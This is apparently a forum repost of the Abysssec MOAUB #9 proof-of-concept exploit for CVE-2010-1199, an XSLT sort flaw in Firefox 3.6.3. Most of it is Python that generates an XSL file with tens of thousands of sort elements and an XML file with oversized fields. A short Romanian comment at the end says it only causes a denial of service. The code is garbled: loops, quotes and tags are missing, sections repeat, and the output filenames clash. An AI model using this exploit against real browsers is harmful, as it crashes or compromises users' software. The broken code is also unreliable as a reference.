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Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability

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Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability

__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _ < Day 9 (Binary Analysis)
| | | | |__| / ____ \ |__| | |_) |
|_| |_|\____/_/ \_\____/|____/



Title : Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability
Version : Firefox 3.6.3
Analysis : http://www.abysssec.com
Vendor : http://www.mozilla.com
Impact : High/Critical
Contact : shahin [at] abysssec.com , info [at] abysssec.com
Twitter : @abysssec
CVE : CVE-2010-1199
import sys;

myStyle = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0"
<xsl:output method="html"/>
<xsl:template match="/">
<table border="1">
<xsl:for-each select="beatles/beatle">

BlockCount = 43000

count = 1
myStyle = myStyle + "<xsl:sort select='name/abysssec"+str(count)+"' order='descending'/>\n"
count = count + 1

myStyle = myStyle +"""
<td><a href="{@link}"><xsl:value-of select="name/lastname"/></a></td>
<td><a href="{@link}"><xsl:value-of select="name/firstname"/></a></td>

cssFile = open("abysssec.xsl","w")

__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _ <
| | | | |__| / ____ \ |__| | |_) |
|_| |_|\____/_/ \_\____/|____/


Title : Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability
Version : Firefox 3.6.3
Analysis : http://www.abysssec.com
Vendor : http://www.mozilla.com
Impact : High/Critical
Contact : shahin [at] abysssec.com , info [at] abysssec.com
Twitter : @abysssec
CVE : CVE-2010-1199
MOAUB Number : MOAU_09_BA
import sys;

myStyle = """<?xml version="1.0"?>
<?xml-stylesheet href="abysssec.xsl" type="text/xsl"?>

block = """
<beatle link="http://www.johnlennon.com">
BlockCount = 2147483647
#myStyle = myStyle + "<tree id='mytree' flex='1' rows='"+str(rowCount)+"'>\n"
count = 1
myStyle = myStyle + """
<beatle link="http://www.johnlennon.com">
myStyle = myStyle + " <firstname>"+"A"*rowCount+"</firstname>\n"
myStyle = myStyle + """
<beatle link="http://www.paulmccartney.com">

myStyle = myStyle + " <firstname>"+"B"*rowCount+"</firstname>\n"
myStyle = myStyle + """ <lastname>McCartney</lastname>
<beatle link="http://www.georgeharrison.com">
myStyle = myStyle + " <firstname>"+"C"*rowCount+"</firstname>\n"
myStyle = myStyle + """
<beatle link="http://www.ringostarr.com">
myStyle = myStyle + " <firstname>"+"D"*rowCount+"</firstname>\n"
myStyle = myStyle + """
<beatle link="http://www.webucator.com" real="no">
myStyle = myStyle + " <firstname>"+"E"*rowCount+"</firstname>\n"
myStyle = myStyle +"""

count = count - 1

myStyle = myStyle +"""
cssFile = open("abyssssec.xml","w")

Sursa: MOAUB #9 - Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability

In primul rand nu vad unde e Remote Code Execution. Poate DOS, asta da.

Apoi .xsl-ul, nu mil-l deschide ci imi apare sa il descarc, probabil e necesar un Content-Type potrivit, dar nu ma chinui sa testez.

Inca o chestie ciudata mi se pare ca nu imi omoara ambele procesoare (core-uri) simultan, ci "profita" de ele pe rand. Cand unul e la 100%, celalalt e la un nivel redus si invers. Imi place asta.

Screenshot: http://i51.tinypic.com/23vzw60.png

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